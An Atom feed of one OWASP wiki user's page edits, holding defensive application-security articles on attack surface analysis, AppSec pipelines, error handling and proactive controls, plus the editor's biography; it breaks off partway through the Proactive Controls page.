https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=Jim+BirdOWASP - User contributions [en]2026-05-17T14:22:21ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=235523Attack Surface Analysis Cheat Sheet2017-11-16T16:39:09Z<p>Jim Bird: </p>
<hr />
<div> __NOTOC__<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Cheatsheets-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' <br />
= What is Attack Surface Analysis and Why is it Important? =<br />
__TOC__{{TOC hidden}}<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (e.g. malware injection, social engineering attacks), and there is less focus on insider threats, although the principles remain the same. The internal attack surface is likely to be different to the external attack surface and some users may have a lot of access.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis is usually done by security architects and pen testers. But developers should understand and monitor the Attack Surface as they design and build and change a system.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what functions and what parts of the system you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend<br />
# identify when you have changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding), and <br />
# all valuable data used in the application, including secrets and keys, intellectual property, critical business data, personal data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can access the system (whether authorized or not). Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users (e.g. database administrators, system administrators). <br />
<br />
Group each type of attack point into buckets based on risk (external-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* User interface (UI) forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* Other local storage<br />
* Email or other kinds of messages<br />
* Run-time arguments<br />
* …. [your points of entry/exit]<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* Interfaces with other applications/systems<br />
* ... [your types]<br />
<br />
You also need to identify the valuable data (e.g. confidential, sensitive, regulated) in the application, by interviewing developers and users of the system, and again by reviewing the source code. <br />
<br />
You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like the [[OWASP_Zed_Attack_Proxy_Project]] or [http://arachni-scanner.com/ Arachni] or [http://code.google.com/p/skipfish/ Skipfish] or [http://w3af.sourceforge.net/ w3af] or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. Some web application firewalls (WAFs) may also be able to export a model of the appliaction's entry points.<br />
<br />
Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: signing up and creating a user profile, logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and [[Application Threat Modeling]]: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.<br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with cryptography, authentication, authorization (access control) and session management<br />
<br />
These are often where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls, and intrusion detection or prevention systems to help protect your application.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
Note that deploying multiple versions of an application, leaving features in that are no longer used just in case they may be needed in the future, or leaving old backup copies and unused code increases the Attack Surface. Source code control and robust change management/configurations practices should be used to ensure the actual deployed Attack Surface matches the theoretical one as closely as possible.<br />
<br />
Backups of code and data - online, and on offline media - are an important but often ignored part of a system's Attack Surface. Protecting your data and IP by writing secure software and hardening the infrastructure will all be wasted if you hand everything over to bad guys by not protecting your backups.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management, authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Similarly for changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time operating system. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF) and real-time application-specific attack detection.<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird - jim.bird[at]owasp.org<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
<br />
{{Cheatsheet_Navigation_Body}}<br />
<br />
|}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=User:Jim_Bird&diff=235522User:Jim Bird2017-11-16T16:33:20Z<p>Jim Bird: </p>
<hr />
<div>Jim Bird is an experienced software development manager and project manager, with more than 25 years of experience in software engineering, IT integration and application operations. Jim is currently a co-founder and the CTO of of a New York-based Alternative Trading System (ATS) for secure and confidential institutional stock trading. As CTO, Jim is responsible for the company's technology strategy and information security programs, as well as managing the company's software development organization.<br />
<br />
Prior to this, Jim worked as a senior consultant to IBM's global financial markets practice, and as a management consultant to stock exchanges and banks globally, including the Deutsche Borse, the Australian Stock Exchange, the Italian Banking Association, the Saudi Arabian Central Bank, and the Korea Exchange. For more than 10 years, he was the CTO of a financial technology company (now part of NASDAQ OMX) that developed and implemented IT solutions for stock exchanges, clearing houses and banks in more than 30 countries around the world. <br />
<br />
Jim has been involved with OWASP and SANS for several years, focusing on the "Builder" side of AppSec. He blogs regularly about secure software development on his personal blog "Building Real Software", and at the SANS Application Security Street Fighter Blog, which he helps to manage. Jim is the author of books on secure Agile development and secure DevOps.</div>Jim Birdhttps://wiki.owasp.org/index.php?title=User:Jim_Bird&diff=235481User:Jim Bird2017-11-15T21:00:42Z<p>Jim Bird: </p>
<hr />
<div>Jim Bird is an experienced software development manager and project manager, with more than 25 years of experience in software engineering, IT integration and application operations. Jim is currently a co-founder and the CTO of of a New York-based Alternative Trading System (ATS) for secure and confidential institutional stock trading. As CTO, Jim is responsible for the company's technology strategy and information security programs, as well as managing the company's software development organization.<br />
<br />
Prior to this, Jim worked as a senior consultant to IBM's global financial markets practice, and to stock exchanges and banks globally, including the Deutsche Borse, the Australian Stock Exchange, the Italian Banking Association, the Saudi Arabian Central Bank, and the Korea Exchange. For more than 10 years, he was the CTO of a software company (now part of NASDAQ OMX) that developed and implemented technology for stock exchanges, clearing houses and banks in more than 30 countries around the world. <br />
<br />
Jim has been involved OWASP and SANS for several years on application security and secure software development. He blogs regularly about secure software development on his personal blog "Building Real Software", and at the SANS Application Security Street Fighter Blog, which he helps to manage. Jim is the author of books on secure Agile development and secure DevOps.</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_AppSec_Pipeline&diff=203590OWASP AppSec Pipeline2015-11-19T18:45:03Z<p>Jim Bird: Fixed some typos</p>
<hr />
<div>=Main=<br />
<!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --><br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
<!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
==The OWASP AppSec Rugged DevOps Pipeline Project==<br />
<br />
The OWASP AppSec Rugged DevOps Pipeline Project is the place to find the information you need to increase the speed and automation of your AppSec program. Using the documentation and references of this project will allow you to setup your own AppSec Pipeline.<br />
<br />
==Description==<br />
<br />
The AppSec pipeline project is a place to gather together information, techniques and tools to create your own AppSec Pipeline. AppSec Pipelines takes the <br />
principles of DevOps and Lean and applies that to an application security program. The project will gather references, cheat sheets, and specific guidance for tools/software which would compose an AppSec Pipeline.<br />
<br />
==Licensing==<br />
<br />
The OWASP AppSec Pipeline Project documentation is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
<!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --><br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is the OWASP AppSec Pipeline Project? ==<br />
<br />
The AppSec Pipeline project is a place to gather together information, techniques and tools to create your own AppSec Pipeline. <br />
<br />
== Project Leaders ==<br />
<br />
[mailto:matt.tesauro@owasp.org Matt Tesauro]<br /><br />
[mailto:aaron.weaver2@gmail.com Aaron Weaver]<br/><br />
[mailto:matt.konda@owasp.org Matt Konda]<br />
<br />
== Related Projects ==<br />
<br />
[[OWASP_Web_Testing_Environment_Project]]<br />
<br />
<!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --><br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Download ==<br />
<br />
[https://github.com/PearsonEducation/bag-of-holding Bag of Holding]<br />
<br />
== News and Events ==<br />
<br />
Catch our next presentation at [http://velocityconf.com/devops-web-performance-ny-2015/public/schedule/detail/42612 Velocity New York]<br />
<br />
== In Print ==<br />
<br />
[http://www.slideshare.net/weaveraaaron/building-an-appsec-pipeline-keeping-your-program-and-your-life-sane Building an AppSec Pipeline]<br /><br />
[http://www.slideshare.net/mtesauro/mtesauro-keynote-appseceu Taking DevOps practices into your AppSec Life]<br />
<br />
==Classifications==<br />
<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] <br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br /> <br />[[File:Project_Type_Files_CODE.jpg|link=]]<br /> <br />[[File:Project_Type_Files_TOOL.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
<br />
=Pipeline Tools=<br />
<br />
==What are DevOp Security Pipeline Tools?==<br />
DevOp security pipeline tools are written with the mindset of API first. The goal is that a security tool will expose all the core functionality of the product as an API. Tools need to have an API so that the 'All the things' can be automated. Each tool will be evaluated with the criteria outlined below including example pipeline use cases.<br />
<br />
==Evaluation Criteria==<br />
<br />
'''Application Description:''' Overview of the security tool, description and product web page.<br><br />
'''API:''' The type of API (REST, SOAP), API coverage (% of total features available via the API) and API Docs.<br><br />
'''Pipeline Position:''' Where in the AppSec pipeline the tool would be best suited to reside<br><br />
'''Cloud Scalable:''' Is the tool cloud aware and can the tool scale based on demand?<br><br />
'''Runs as a Service:''' Can the tool run as a service or in headless mode?<br><br />
'''Pipeline Example:''' Link to an example use case of the tool in the pipeline<br><br />
'''Client Libraries:''' What client libraries are written to assist in integration. For example a python or Go library.<br><br />
'''CI/CD Plugins:''' Does the tool have CI/CD plugins for integration into a DevOps pipeline. For example a Jenkins plugin.<br><br />
'''Data Sent to the Cloud:''' What kind of data, if any, is sent off premise to the cloud? Is there an option to keep all data in-house?<br><br />
<br />
==Results==<br />
<br />
We are currently working on gathering a list of the current tools and evaluating each tool based on the criteria listed. The goal is to create a one page wiki document of the application.<br />
<br />
==Sample Tooling by Phase==<br />
<br />
[[File:DevOps_AppSec_Tool_Integration.png]]<br />
<br />
==Get Involved==<br />
Interested in participating or having your product included in the review? Contact [mailto:aaron.weaver2@gmail.com Aaron Weaver]<br />
<br />
= Pipeline Design Patterns =<br />
<br />
==What is an AppSec Pipeline?==<br />
<br />
An AppSec Pipelines takes the principles of DevOps and Lean and applies that to an application security program. An AppSec pipeline is designed for iterative improvement and has the ability to grow in functionality organically over time. When starting out an AppSec Pipeline choose the area that is your greatest pain point and work on a reusable path for all the AppSec activities that follow. <br />
<br />
Pipelines have four distinct areas which will be covered in depth. The first is the "Intake process" or "first impression." This is where customers request AppSec services such as dynamic, static or manual assessments from the AppSec team. The intake process consists of an application repository that a requestor will either choose from a listing of applications or provide the details of the application. The second part is "triage" where the determination is made for applying the requested services. An application request may have an automated scan in which case a request would be made to conduct a ZAP scan. The third part is "test" which is the heart of the pipeline. It is here where all the AppSec tools are automated, results are fed into a central repository and reviewed for false positives. Finally the end of the pipeline is "deliver" where the results are distributed to the customer. This will vary by organization, however most pipelines will integrate with a defect tracker and will produce summary metrics and reporting for senior management.<br />
<br />
The goal of an AppSec Pipeline is to provides a consistent process from the application security team and the constituency which typically is developers, QA, product managers and senior stakeholders. Throughout the process flow each activity has well-defined states. The pipeline relies heavily on automation for repeatable tasks so that the critical resource, AppSec personnel, is optimized.<br />
<br />
[[File:AppSec_Pipeline_Rugged_DevOps.png|800px|thumb|left|Rugged DevOps AppSec Pipeline Template]]<br />
<br />
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br />
<br><br />
===Pipeline - Intake (“First Impression”)===<br />
The intake portion of the pipeline is one of the most important aspects of the pipeline. It is here where services are requested from the team. Each service request should be clearly stated and defined. For example consider grouping service requests into bundles. An application security assessment usually consists of a dynamic scan, static scan and manual review. Bundle these into one request and title it 'Application Security Assessment'.<br />
<br />
The pipeline request should feed into an application repository that keeps track of the metadata on the application, key contacts, prior engagements and current vulnerabilities. <br />
<br />
'''Application Metadata'''<br><br />
Knowing the background details about an application is an important part of carrying out a successful application assessment. By gathering this data key decisions can be automated. For example if you know that the application being assessed is a critical application, has PII and has 1 million records then you can automatically recommend and or require certain activities. These activities could include a threat model, an automated assessment with manual review.<br><br />
<br />
Key fields recommended for intake are the following:<br><br />
<br />
*'''Application General Information''': Name, Brief Description, Business Line<br><br />
*'''Application Metadata''': Business Criticality, Platform, LIfecycle, Origin, User Records, Revenue, External Audience, Internet Accessible<br><br />
*'''Technologies''': Coding Language, Data Store, DDoS Protection, Firewall, Framework, Hosting Provider, Operation System, Third-Party Component, Web Server<br><br />
*'''Regulations''': Examples: PCI, SOC, FERPA DPA, SOX etc.<br><br />
*'''Data Elements''': PII (First name, Last name, Email, Address, Postal Code, Social)<br><br />
<br />
'''Key Concepts'''<br />
* Bundle application service requests instead of offering al la carte.<br />
*Ask for data about applications only once<br />
*Have data reviewed periodically. (A great time is when new services are requested on the application.)<br />
<br />
'''Recommended Tools'''<br />
A complete listing of tools and review will be in the Pipeline Tools section.<br />
*[https://github.com/PearsonEducation/bag-of-holding Bag of Holding ]: An application security utility to assist in the organization and prioritization of software security activities.<br />
**Dashboard showing entire application portfolio and last assessment date<br />
**Applications requiring assessments<br />
**Managing the work load for assessments<br />
**KPI's around application workload<br />
**Tracking of dev team training and overall maturity<br />
**Request form for dev/product managers to request an application review<br />
<br />
===Pipeline - Triage ===<br />
* Inbound request triage<br />
**Ala Carte App Sec<br />
**Dynamic Testing<br />
**Static Testing<br />
**Re-Testing mitigated findings<br />
**Mix and match based on risk <br />
<br />
'''Key Concepts''' <br />
*Activities can be run in parallel<br />
*Automation on setup, configuration, data export<br />
*People focus on customization rather than setup<br />
<br />
===Pipeline - Test===<br />
<br />
===Pipeline - Deliver===<br />
Source of truth for all AppSec activities<br />
*Dedupe / Consolidate findings<br />
*Normalize scanner data<br />
*Generate Metrics<br />
*Push issues to bug trackers<br />
* Report and metrics automation REST + tfclient<br />
*Source of many touch points with external teams<br />
<br />
===How do I integrate an AppSec Pipeline into my existing pipeline(s)?===<br />
<br />
[[File:DevOps_AppSec_Pipline_Integration.png|800px|thumb|left|Example Integration of DevOps and AppSec Pipeline]]<br />
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br />
<br />
==AppSec Pipeline Example #1==<br />
<br />
[[File:AppSec-Pipeline-Example.png|800px|thumb|left|Example Rugged DevOps AppSec Pipeline]]<br />
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br />
<br />
= Presentations =<br />
<br />
'''AppSec Pipeline Presentations'''<br />
*[https://www.youtube.com/watch?v=1CDSOSl4DQU Building An AppSec Pipeline] Aaron Weaver - AppSec EU 2015 <br /><br />
*[https://www.youtube.com/watch?v=tDnyFitE0y4 Taking DevOps Practices Into Your AppSec Life] Matt Tesauro - AppSec EU 2015 <br />
<br />
'''Rugged DevOp Interviews'''<br />
* [http://www.sonatype.org/nexus/2015/09/28/devops-security-and-development-w-matt-tesauro-jez-humble-and-shannon-lietz/ DevOps, Security and Development w/ Matt Tesauro, Jez Humble and Shannon Lietz] AppSec USA 2015<br />
* [https://youtu.be/h3sw-N2KKfo Pipeline Project Interview] Matt Konda - AppSec USA 2015<br />
<br />
'''Rugged DevOps'''<br />
* [http://gotocon.com/dl/goto-london-2015/slides/ShannonLietz_TheRoadToBeingRugged.pdf The Road to Being Rugged] Shannon Lietz - GOTO 2015<br />
* [http://gotocon.com/dl/goto-london-2015/slides/MichaelBrunton-Spall_WhenDevopsMeetsSecurity.pdf When Devops Meets Security] Michael Brunton-Spall - GOTO 2015<br />
* [http://gotocon.com/dl/goto-london-2015/slides/DavidEtue_RuggedBuildingMaterialsAndCreatingAgilityWithSecurity.pdf Rugged Building Materials and Creating Agility with Security] David Etue - GOTO 2015<br />
* [http://gotocon.com/dl/goto-london-2015/slides/JamesWickett_HowToEffectChangeInTheEpistemologicalWastelandOfApplicationSecurity.pdf How to effect change in the Epistemological Wasteland of Application Security] James Wickett - GOTO 2015<br />
<br />
=Metrics=<br />
<br />
===TBD===<br />
<br />
=FAQs=<br />
<br />
Got a question? <br />
<br />
Ask us on Twitter: <br />
* [https://twitter.com/appsecpipeline @appsecpipeline] <br />
* [https://twitter.com/matt_tesauro @matt_tesauro]<br />
* [https://twitter.com/matt_tesauro @weavera]<br />
<br />
= Acknowledgements =<br />
<br />
==Contributors==<br />
<br />
Besides the project leaders, contributions have been made by:<br />
<br />
* [https://github.com/aparsons Adam Parsons] - Bag of Holding<br />
* Matt Brown - suggestions and review of Bag of Holding<br />
* Lee Thurlow - suggestions and review of Bag of Holding<br />
<br />
= Getting Involved =<br />
<br />
Involvement in the DevOps AppSec Pipeline is actively encouraged!<br />
<br />
You do not have to be a security expert in order to contribute.<br />
<br />
Some of the ways you can help:<br />
<br />
==Case Studies==<br />
<br />
Share your AppSec Pipeline! We would like to gather case studies on how organizations are addressing AppSec at scale. Please email the project leaders to have your case study added. <br />
<br />
==Tools==<br />
<br />
Is there a tool that is missing from our AppSec tooling review? Has your organization integrated or created a tool that integrates into the AppSec pipeline? Click on the 'Pipeline Tool's to contribute your review/tool. <br />
<br />
==Feedback==<br />
<br />
Please use our mailing list for feedback:<br />
* What do like?<br />
* What don't you like?<br />
<br />
<!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --><br />
__NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP Project]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Improper_Error_Handling&diff=202329Improper Error Handling2015-10-19T19:48:28Z<p>Jim Bird: Corrected link to Testing Guide</p>
<hr />
<div>==Description==<br />
<br />
Improper handling of errors can introduce a variety of security problems for a web site. The most common problem is when detailed internal error messages such as stack traces, database dumps, and error codes are displayed to the user (hacker). These messages reveal implementation details that should never be revealed. Such details can provide hackers important clues on potential flaws in the site and such messages are also disturbing to normal users.<br />
<br />
Web applications frequently generate error conditions during normal operation. Out of memory, null pointer exceptions, system call failure, database unavailable, network timeout, and hundreds of other common conditions can cause errors to be generated. These errors must be handled according to a well thought out scheme that will provide a meaningful error message to the user, diagnostic information to the site maintainers, and no useful information to an attacker.<br />
<br />
Even when error messages don’t provide a lot of detail, inconsistencies in such messages can still reveal important clues on how a site works, and what information is present under the covers. For example, when a user tries to access a file that does not exist, the error message typically indicates, “file not found”. When accessing a file that the user is not authorized for, it indicates, “access denied”. The user is not supposed to know the file even exists, but such inconsistencies will readily reveal the presence or absence of inaccessible files or the site’s directory structure.<br />
<br />
One common security problem caused by improper error handling is the fail-open security check. All security mechanisms should deny access until specifically granted, not grant access until denied, which is a common reason why fail open errors occur. Other errors can cause the system to crash or consume significant resources, effectively denying or reducing service to legitimate users.<br />
<br />
Good error handling mechanisms should be able to handle any feasible set of inputs, while enforcing proper security. Simple error messages should be produced and logged so that their cause, whether an error in the site or a hacking attempt, can be reviewed. Error handling should not focus solely on input provided by the user, but should also include any errors that can be generated by internal components such as system calls, database queries, or any other internal functions.<br />
<br />
==Environments Affected==<br />
<br />
All web servers, application servers, and web application environments are susceptible to error handling problems.<br />
<br />
==Examples and References==<br />
<br />
* [https://www.owasp.org/index.php/Testing_for_Error_Code_%28OTG-ERR-001%29 OWASP Testing Guide - generating error codes] <br />
<br />
==How to Determine If You Are Vulnerable ==<br />
<br />
Typically, simple testing can determine how your site responds to various kinds of input errors. More thorough testing is usually required to cause internal errors to occur and see how the site behaves. <br />
<br />
Another valuable approach is to have a detailed code review that searches the code for error handling logic. Error handling should be consistent across the entire site and each piece should be a part of a well-designed scheme. A code review will reveal how the system is intended to handle various types of errors. If you find that there is no organization to the error-handling scheme or that there appear to be several different schemes, there is quite likely a problem.<br />
<br />
==How to Protect Yourself==<br />
<br />
A specific policy for how to handle errors should be documented, including the types of errors to be handled and for each, what information is going to be reported back to the user, and what information is going to be logged. All developers need to understand the policy and ensure that their code follows it.<br />
<br />
In the implementation, ensure that the site is built to gracefully handle all possible errors. When errors occur, the site should respond with a specifically designed result that is helpful to the user without revealing unnecessary internal details. Certain classes of errors should be logged to help detect implementation flaws in the site and/or hacking attempts.<br />
Very few sites have any intrusion detection capabilities in their web application, but it is certainly conceivable that a web application could track repeated failed attempts and generate alerts. Note that the vast majority of web application attacks are never detected because so few sites have the capability to detect them. Therefore, the prevalence of web application security attacks is likely to be seriously underestimated.<br />
<br />
The OWASP Filters project is producing reusable components in several languages to help prevent error codes leaking into user’s web pages by filtering pages when they are constructed dynamically by the application.<br />
<br />
__NOEDITSECTION__</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=196376OWASP Proactive Controls2015-06-19T17:10:42Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be security flaws inherent in the requirements and designs. When it comes to software, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. They are ordered by order of importance, with control number 1 being the most important. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the complete document in the tab to the right.<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the most important control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Presentation ==<br />
<br />
Use the extensive [[media:OWASP_Top_Ten_Proactive_Controls_v2.pptx|project presentation]] that expands on the information in the document.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
